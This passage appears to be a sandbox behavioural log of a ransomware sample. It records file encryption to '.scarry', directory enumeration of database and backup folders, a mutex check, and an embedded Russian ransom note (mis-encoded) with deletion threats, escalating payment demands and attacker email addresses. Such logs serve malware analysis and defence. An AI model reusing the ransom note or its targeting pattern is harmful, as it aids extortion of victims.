(lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\AzQX0q5p4V3C2CA2Q4gBgngW2woDnQ.scarry", dwFileAttributes=0x20) returned 1 [0108.992] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ab98, cbMultiByte=36, lpWideCharStr=0x18dd68, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT\x18\x03") returned 36 [0108.992] GlobalLock (hMem=0x45000c) returned 0x591988 [0108.992] GlobalHandle (pMem=0x591988) returned 0x45000c [0108.992] GlobalUnlock (hMem=0x45000c) returned 0 [0108.992] GlobalLock (hMem=0x45000c) returned 0x591988 [0108.992] GlobalLock (hMem=0x450004) returned 0x593998 [0108.992] GlobalHandle (pMem=0x591988) returned 0x45000c [0108.992] GlobalUnlock (hMem=0x45000c) returned 0 [0108.992] GlobalHandle (pMem=0x593998) returned 0x450004 [0108.992] GlobalUnlock (hMem=0x450004) returned 0 [0108.992] CompareStringA (Locale=0x400, dwCmpFlags=0x0, lpString1="{{IDENTIFIER}}\r\n\r\nÂàøè äîêóìåíòû, ôîòîãðàôèè, áàçû äàííûõ è äðóãèå âàæíûå ôàéëû áûëè çàøèôðîâàíû. \r\nÊàæäûå 24 ÷àñà óäàëÿþòñÿ 24 ôàéëà, íåîáõîäèìî ïðèñëàòü ñâîé èäåíòèôèêàòîð ÷òîá ìû îòêëþ÷èëè ýòó ôóíêöèþ.\r\nÊàæäûå 24 ÷àñà ñòîèìîñòü ðàñøèôðîâêè äàííûõ óâåëè÷èâàåòñÿ íà 30% (÷åðåç 72 ÷àñà ñóììà ôèêñèðóåòñÿ)\r\n\r\nÄëÿ ðàñøèôðîâêè äàííûõ:\r\n\r\nÍàïèøèòå íà ïî÷òó - scarry38@horsefucker.org\r\n \r\n * ïèñüìå óêàçàòü Âàø ëè÷íûé èäåíòèôèêàòîð\r\n *Ïðèêðåïèòå 2 ôàéëà äî 1 ìá äëÿ òåñòîâîé ðàñøèôðîâêè. \r\n ìû èõ ðàñøèôðóåì, â êà÷åñòâå äîêàçàòåëüñòâà, ÷òî ÒÎËÜÊÎ ÌÛ ìîæåì ðàñøèôðîâàòü ôàéëû.\r\n\r\nÂÀÆÍÎ! Íå ïèøèòå ñ mail.ru (ê íàì íå äîõîäÿò ïèüñìà) Èñïîëüçóéòå - yandex.ru gmail.com è ò.ä. \r\nÂñå êðîìå mail.ru\r\n\r\n -×åì áûñòðåå âû ñîîáùèòå íàì ñâîé èäåíòèôèêàòîð, òåì áûñòðåå ìû âûêëþ÷èì ïðîèçâîëüíîå óäàëåíèå ôàéëîâ.\r\n -Íàïèñàâ íàì íà ïî÷òó âû ïîëó÷èòå äàëüíåéøèå èíñòðóêöèè ïî îïëàòå.\r\n\r\n îòâåòíîì ïèñüìå Âû ïîëó÷èòå ïðîãðàììó äëÿ ðàñøèôðîâêè.\r\nÏîñëå çàïóñêà ïðîãðàììû-äåøèôðîâùèêà âñå Âàøè ôàéëû áóäóò âîññòàíîâëåíû.\r\n\r\nÌû ãàðàíòèðóåì:\r\n100% óñïåøíîå âîññòàíîâëåíèå âñåõ âàøèõ ôàéëîâ\r\n100% ãàðàíòèþ ñîîòâåòñòâèÿ\r\n100% áåçîïàñíûé è íàäåæíûé ñåðâèñ\r\n\r\nÂíèìàíèå!\r\n * Íå ïûòàéòåñü óäàëèòü ïðîãðàììó èëè çàïóñêàòü àíòèâèðóñíûå ñðåäñòâà\r\n * Ïîïûòêè ñàìîñòîÿòåëüíîé ðàñøèôðîâêè ôàéëîâ ïðèâåäóò ê ïîòåðå Âàøèõ äàííûõ\r\n * Äåøèôðàòîðû äðóãèõ ïîëüçîâàòåëåé íåñîâìåñòèìû ñ Âàøèìè äàííûìè, òàê êàê ó êàæäîãî ïîëüçîâàòåëÿ\r\nóíèêàëüíûé êëþ÷ øèôðîâàíèÿ\r\n\r\n Åñëè âàì íå îòâåòèëè â òå÷åíèè 24õ ÷àñîâ, ïèøèòå íà ðåçåðâíóþ ïî÷òó - black8201@protonmail.com\r\n====================================================================================================\r\n\r\nÂàø ëè÷íûé èäåíòèôèêàòîð\r\n\r\n{{IDENTIFIER}}", cchCount1=14, lpString2="{{IDENTIFIER}}", cchCount2=14) returned 2 [0108.993] CompareStringA (Locale=0x400, dwCmpFlags=0x0, lpString1="{{IDENTIFIER}}", cchCount1=14, lpString2="{{IDENTIFIER}}", cchCount2=14) returned 2 [0108.993] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT", lpFindFileData=0x18eb1c | out: lpFindFileData=0x18eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd8d32a0, ftCreationTime.dwHighDateTime=0x1d61645, ftLastAccessTime.dwLowDateTime=0xfd8d32a0, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0xfd8d32a0, ftLastWriteTime.dwHighDateTime=0x1d61645, nFileSizeHigh=0x0, nFileSizeLow=0xdf9, dwReserved0=0xe80020c8, dwReserved1=0x402, cFileName="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT", cAlternateFileName="D407~1.TXT")) returned 0x58b060 [0108.993] FileTimeToLocalFileTime (in: lpFileTime=0x18eb30, lpLocalFileTime=0x18eab0 | out: lpLocalFileTime=0x18eab0) returned 1 [0108.993] FileTimeToDosDateTime (in: lpFileTime=0x18eab0, lpFatDate=0x18eafe, lpFatTime=0x18eafc | out: lpFatDate=0x18eafe, lpFatTime=0x18eafc) returned 1 [0108.993] FindClose (in: hFindFile=0x58b060 | out: hFindFile=0x58b060) returned 1 [0108.993] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0108.993] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0x0 [0108.993] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0xdf9 [0108.993] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0x0 [0108.993] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0x0 [0108.993] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0xdf9 [0108.993] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0x0 [0108.993] ReadFile (in: hFile=0x1a4, lpBuffer=0x1e7ad38, nNumberOfBytesToRead=0xdf9, lpNumberOfBytesRead=0x18ed28, lpOverlapped=0x0 | out: lpBuffer=0x1e7ad38*, lpNumberOfBytesRead=0x18ed28*=0xdf9, lpOverlapped=0x0) returned 1 [0108.993] CloseHandle (hObject=0x1a4) returned 1 [0108.994] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95fd7600, ftCreationTime.dwHighDateTime=0x1bc9dc7, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x95fd7600, ftLastWriteTime.dwHighDateTime=0x1bc9dc7, nFileSizeHigh=0x0, nFileSizeLow=0x1de8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MTEXTRA.TTF", cAlternateFileName="")) returned 0 [0108.994] GetLastError () returned 0x12 [0108.994] FindClose (in: hFindFile=0x58b020 | out: hFindFile=0x58b020) returned 1 [0108.994] GlobalLock (hMem=0x450004) returned 0x591988 [0108.994] GlobalHandle (pMem=0x591988) returned 0x450004 [0108.994] GlobalUnlock (hMem=0x450004) returned 0 [0108.994] GlobalLock (hMem=0x450004) returned 0x591988 [0108.994] GlobalLock (hMem=0x45000c) returned 0x593998 [0108.994] GlobalHandle (pMem=0x591988) returned 0x450004 [0108.994] GlobalUnlock (hMem=0x450004) returned 0 [0108.994] GlobalHandle (pMem=0x593998) returned 0x45000c [0108.994] GlobalUnlock (hMem=0x45000c) returned 0 [0108.994] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*.*", lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe19a3c0, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0xfe19a3c0, ftLastWriteTime.dwHighDateTime=0x1d61645, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x58b020 [0108.995] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc8 | out: lpLocalFileTime=0x18edc8) returned 1 [0108.995] FileTimeToDosDateTime (in: lpFileTime=0x18edc8, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0108.995] GlobalLock (hMem=0x45000c) returned 0x591988 [0108.995] GlobalHandle (pMem=0x591988) returned 0x45000c [0108.995] GlobalUnlock (hMem=0x45000c) returned 0 [0108.995] GlobalLock (hMem=0x45000c) returned 0x591988 [0108.995] GlobalLock (hMem=0x450004) returned 0x593998 [0108.995] GlobalHandle (pMem=0x591988) returned 0x45000c [0108.995] GlobalUnlock (hMem=0x45000c) returned 0 [0108.995] GlobalHandle (pMem=0x593998) returned 0x450004 [0108.995] GlobalUnlock (hMem=0x450004) returned 0 [0108.995] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0108.995] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe19a3c0, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0xfe19a3c0, ftLastWriteTime.dwHighDateTime=0x1d61645, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0108.995] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0108.995] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0108.995] GlobalLock (hMem=0x450004) returned 0x591988 [0108.995] GlobalHandle (pMem=0x591988) returned 0x450004 [0108.995] GlobalUnlock (hMem=0x450004) returned 0 [0108.995] GlobalLock (hMem=0x450004) returned 0x591988 [0108.995] GlobalLock (hMem=0x45000c) returned 0x593998 [0108.995] GlobalHandle (pMem=0x591988) returned 0x450004 [0108.995] GlobalUnlock (hMem=0x450004) returned 0 [0108.996] GlobalHandle (pMem=0x593998) returned 0x45000c [0108.996] GlobalUnlock (hMem=0x45000c) returned 0 [0108.996] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0108.996] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0108.996] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0108.996] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0108.996] GlobalLock (hMem=0x45000c) returned 0x591988 [0108.996] GlobalHandle (pMem=0x591988) returned 0x45000c [0108.996] GlobalUnlock (hMem=0x45000c) returned 0 [0108.996] GlobalLock (hMem=0x45000c) returned 0x591988 [0108.996] GlobalLock (hMem=0x450004) returned 0x593998 [0108.996] GlobalHandle (pMem=0x591988) returned 0x45000c [0108.996] GlobalUnlock (hMem=0x45000c) returned 0 [0108.996] GlobalHandle (pMem=0x593998) returned 0x450004 [0108.996] GlobalUnlock (hMem=0x450004) returned 0 [0108.996] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0108.996] GlobalLock (hMem=0x450004) returned 0x591988 [0108.996] GlobalHandle (pMem=0x591988) returned 0x450004 [0108.996] GlobalUnlock (hMem=0x450004) returned 0 [0108.996] GlobalLock (hMem=0x450004) returned 0x591988 [0108.996] GlobalLock (hMem=0x45000c) returned 0x593998 [0108.996] GlobalHandle (pMem=0x591988) returned 0x450004 [0108.997] GlobalUnlock (hMem=0x450004) returned 0 [0108.997] GlobalHandle (pMem=0x593998) returned 0x45000c [0108.997] GlobalUnlock (hMem=0x45000c) returned 0 [0108.997] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0108.997] SysReAllocStringLen (in: pbstr=0x18edc4*=0x0, psz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033", len=0x3c | out: pbstr=0x18edc4*="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033") returned 1 [0108.997] GlobalLock (hMem=0x45000c) returned 0x591988 [0108.997] GlobalHandle (pMem=0x591988) returned 0x45000c [0108.997] GlobalUnlock (hMem=0x45000c) returned 0 [0108.997] GlobalLock (hMem=0x45000c) returned 0x591988 [0108.997] GlobalLock (hMem=0x450004) returned 0x593998 [0108.997] GlobalHandle (pMem=0x591988) returned 0x45000c [0108.997] GlobalUnlock (hMem=0x45000c) returned 0 [0108.997] GlobalHandle (pMem=0x593998) returned 0x450004 [0108.997] GlobalUnlock (hMem=0x450004) returned 0 [0108.997] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\Microsoft\\Exchange Server", lpFindFileData=0x18e840 | out: lpFindFileData=0x18e840*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="䱈@팒X틦X企@\x18㽜V\x18\x1b")) returned 0xffffffff [0109.071] GetLastError () returned 0x3 [0109.071] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.071] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d2c0, cbMultiByte=26, lpWideCharStr=0x18da44, cchWideChar=2047 | out: lpWideCharStr="microsoft\\exchange server\\\x1b") returned 26 [0109.071] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=21, lpWideCharStr=0x18da8c, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server\\rver\\") returned 21 [0109.071] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\Microsoft SQL Server", lpFindFileData=0x18e840 | out: lpFindFileData=0x18e840*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="V䱠@퉬X企@\x18괜V\x181")) returned 0xffffffff [0109.072] GetLastError () returned 0x2 [0109.072] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.072] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d2c0, cbMultiByte=21, lpWideCharStr=0x18da44, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server\\\x18\x15") returned 21 [0109.072] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=9, lpWideCharStr=0x18da8c, cchWideChar=2047 | out: lpWideCharStr="Firebird\\ SQL Server\\rver\\") returned 9 [0109.072] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\Firebird", lpFindFileData=0x18e840 | out: lpFindFileData=0x18e840*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="V䱠@퐼X企@\x18㪔X\x18;")) returned 0xffffffff [0109.073] GetLastError () returned 0x2 [0109.073] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.073] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9a68, cbMultiByte=9, lpWideCharStr=0x18da44, cchWideChar=2047 | out: lpWideCharStr="firebird\\") returned 9 [0109.073] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=8, lpWideCharStr=0x18da8c, cchWideChar=2047 | out: lpWideCharStr="MSSQL.1\\\\ SQL Server\\rver\\") returned 8 [0109.073] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\MSSQL.1", lpFindFileData=0x18e840 | out: lpFindFileData=0x18e840*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="V䱠@麌W企@\x18㩄X\x18D")) returned 0xffffffff [0109.073] GetLastError () returned 0x2 [0109.074] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.074] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9a68, cbMultiByte=8, lpWideCharStr=0x18da44, cchWideChar=2047 | out: lpWideCharStr="mssql.1\\ ") returned 8 [0109.074] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=37, lpWideCharStr=0x18da8c, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server Compact Edition\\") returned 37 [0109.074] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\Microsoft SQL Server Compact Edition", lpFindFileData=0x18e840 | out: lpFindFileData=0x18e840*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="V䱠@퉬X企@\x18퐼X\x18j")) returned 0xffffffff [0109.074] GetLastError () returned 0x2 [0109.074] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.074] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ace8, cbMultiByte=37, lpWideCharStr=0x18da44, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server compact edition\\icrosoft SQL Server Compact Edition\\") returned 37 [0109.075] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18da8c, cchWideChar=2047 | out: lpWideCharStr="Adobe\\oft SQL Server Compact Edition\\") returned 6 [0109.075] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\Adobe", lpFindFileData=0x18e840 | out: lpFindFileData=0x18e840*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="V䱠@麌W企@\x18㪔X\x18q")) returned 0xffffffff [0109.075] GetLastError () returned 0x2 [0109.075] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.075] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9a68, cbMultiByte=6, lpWideCharStr=0x18da44, cchWideChar=2047 | out: lpWideCharStr="adobe\\퐸XP") returned 6 [0109.075] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18da8c, cchWideChar=2047 | out: lpWideCharStr="Oracle\\ft SQL Server Compact Edition\\") returned 7 [0109.075] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\Oracle", lpFindFileData=0x18e840 | out: lpFindFileData=0x18e840*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="V䱠@鰄W企@\x18㩄X\x18y")) returned 0xffffffff [0109.076] GetLastError () returned 0x2 [0109.076] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.076] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9a68, cbMultiByte=7, lpWideCharStr=0x18da44, cchWideChar=2047 | out: lpWideCharStr="oracle\\X ") returned 7 [0109.076] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18da8c, cchWideChar=2047 | out: lpWideCharStr="Archiveft SQL Server Compact Edition\\") returned 7 [0109.076] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\Archive", lpFindFileData=0x18e840 | out: lpFindFileData=0x18e840*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="V䱠@퉬X企@\x18㪔X\x18\x81")) returned 0xffffffff [0109.076] GetLastError () returned 0x2 [0109.076] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.076] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9a68, cbMultiByte=7, lpWideCharStr=0x18da44, cchWideChar=2047 | out: lpWideCharStr="archiveX ") returned 7 [0109.077] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18da8c, cchWideChar=2047 | out: lpWideCharStr="Backupeft SQL Server Compact Edition\\") returned 6 [0109.077] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\Backup", lpFindFileData=0x18e840 | out: lpFindFileData=0x18e840*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="V䱠@麌W企@\x18㩄X\x18\x88")) returned 0xffffffff [0109.077] GetLastError () returned 0x2 [0109.077] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.077] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9a68, cbMultiByte=6, lpWideCharStr=0x18da44, cchWideChar=2047 | out: lpWideCharStr="backup㪐X ") returned 6 [0109.077] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18da8c, cchWideChar=2047 | out: lpWideCharStr="Reserveft SQL Server Compact Edition\\") returned 6 [0109.077] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\Reserv", lpFindFileData=0x18e840 | out: 